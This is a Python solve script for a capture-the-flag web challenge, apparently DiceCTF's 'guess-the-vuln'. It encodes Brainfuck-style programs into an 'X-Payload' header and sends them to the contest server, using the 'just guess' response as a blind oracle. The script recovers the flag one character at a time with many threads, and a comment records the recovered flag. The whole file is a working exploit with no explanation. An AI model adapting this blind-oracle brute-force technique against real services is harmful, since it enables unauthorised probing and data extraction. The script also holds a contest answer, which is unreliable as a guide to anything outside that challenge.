import requests
import threading

def convert(code):
    return code.replace('>', 'l')\
               .replace('<', 'h')\
               .replace('+', 'k')\
               .replace('-', 'j')\
               .replace('[', '{')\
               .replace(']', '}')

oracle = {
    "0": "-[----->+<]>---.",
    "1": "-[----->+<]>--.",
    "2": "-[----->+<]>-.",
    "3": "-[----->+<]>.",
    "4": "-[----->+<]>+.",
    "5": "-[----->+<]>++.",
    "6": "-[----->+<]>+++.",
    "7": "-[----->+<]>++++.",
    "8": "+[--------->+<]>-.",
    "9": "+[--------->+<]>.",
    "a": "--[----->+<]>-----.",
    "b": "--[----->+<]>----.",
    "c": "--[----->+<]>---.",
    "d": "--[----->+<]>--.",
    "e": "--[----->+<]>-.",
    "f": "--[----->+<]>.",
    "g": "+[----->+++<]>.",
    "h": "+[----->+++<]>+.",
    "i": "+[----->+++<]>++.",
    "j": "+[----->+++<]>+++.",
    "k": "+[----->+++<]>++++.",
    "l": "+[------->++<]>--.",
    "m": "+[------->++<]>-.",
    "n": "+[------->++<]>.",
    "o": "+[------->++<]>+.",
    "p": "+[------->++<]>++.",
    "q": "+[------->++<]>+++.",
    "r": "+[--------->++<]>.",
    "s": "+[--------->++<]>+.",
    "t": "--------[-->+++<]>.",
    "u": "----[-->+++++<]>-.",
    "v": "----[-->+++++<]>.",
    "w": "------[-->+++<]>.",
    "x": "----[-->+++<]>--.",
    "y": "----[-->+++<]>-.",
    "z": "----[-->+++<]>.",
    "A": "----[---->+<]>++.",
    "B": "++++[++++>---<]>-.",
    "C": "++++[++++>---<]>.",
    "D": "++++[++++>---<]>+.",
    "E": "++++[++++>---<]>++.",
    "F": "-[------->+<]>---.",
    "G": "-[------->+<]>--.",
    "H": "-[------->+<]>-.",
    "I": "-[------->+<]>.",
    "J": "-[------->+<]>+.",
    "K": "-[------->+<]>++.",
    "L": "-[------->+<]>+++.",
    "M": "++[---------->+<]>.",
    "N": "-[--->+<]>-------.",
    "O": "-[--->+<]>------.",
    "P": "-[--->+<]>-----.",
    "Q": "-[--->+<]>----.",
    "R": "-[--->+<]>---.",
    "S": "-[--->+<]>--.",
    "T": "-[--->+<]>-.",
    "U": "-[--->+<]>.",
    "V": "+[--->++<]>.",
    "W": "+[--->++<]>+.",
    "X": "+[--->++<]>++.",
    "Y": "+[--->++<]>+++.",
    "Z": "+[--->++<]>++++.",
    "!": "++++[->++++++++<]>+.",
    '"': "--[------->++<]>--.",
    "#": "--[------->++<]>-.",
    "$": "--[------->++<]>.",
    "%": "+[------->+++<]>.",
    "&": "+[------->+++<]>+.",
    "'": "+[------->+++<]>++.",
    "(": "++[------>+<]>---.",
    ")": "++[------>+<]>--.",
    "*": "++[------>+<]>-.",
    "+": "++[------>+<]>.",
    ",": "++[------>+<]>+.",
    "-": "++[------>+<]>++.",
    ".": "++[------>+<]>+++.",
    "/": "-[----->+<]>----.",
    ":": "+[--------->+<]>+.",
    ";": "+[--------->+<]>++.",
    "<": "----[---->+<]>---.",
    "=": "----[---->+<]>--.",
    ">": "----[---->+<]>-.",
    "?": "----[---->+<]>.",
    "@": "----[---->+<]>+.",
    "[": "+[--->++<]>+++++.",
    "\\": "++++[--->+++++<]>.",
    "]": "+[--->++<]>+++++++.",
    "^": "+[--->++<]>++++++++.",
    "_": "+[--->++<]>+++++++++.",
    "`": "--[----->+<]>------.",
    "{": "--[-->+++++<]>.",
    "|": "--[-->+++<]>-.",
    "}": "--[-->+++<]>.",
    "~": "--[-->+<]>-.",
    " ": "++++[->++++++++<]>.",
}
# invert
for key in oracle:
    s = oracle[key][:-1]
    pos = s.find(">")
    s = s[:pos] + s[pos:].replace("+", "X").replace("-", "+").replace("X", "-")
    oracle[key] = s

# find
def blackbox(pos, char):
    global candidate
    cmd = '>' + chr(0x30 + pos) + '<' + oracle[char] + '[]'
    r = requests.get('https://guess-the-vuln.dicec.tf/a', headers={
        'X-Payload': convert(cmd)
    })
    if 'just guess' in r.text:
        candidate.append(char)

import time
# dice{obviously_just_brainf_in_header_in_options}
flag = ''
for i in range(32, 128):
    thlist = []
    candidate = []
    for char in oracle:
        th = threading.Thread(target=blackbox, args=(i, char))
        th.start()
        thlist.append(th)
        time.sleep(0.1)
    for th in thlist:
        th.join()

    if len(candidate) == 0:
        print("Not Found :(")
        exit(1)

    flag += candidate[0]
    if len(candidate) > 1:
        print("[!] Multiple candidates")
        print(i, candidate)
    print(f"[+] {flag}")

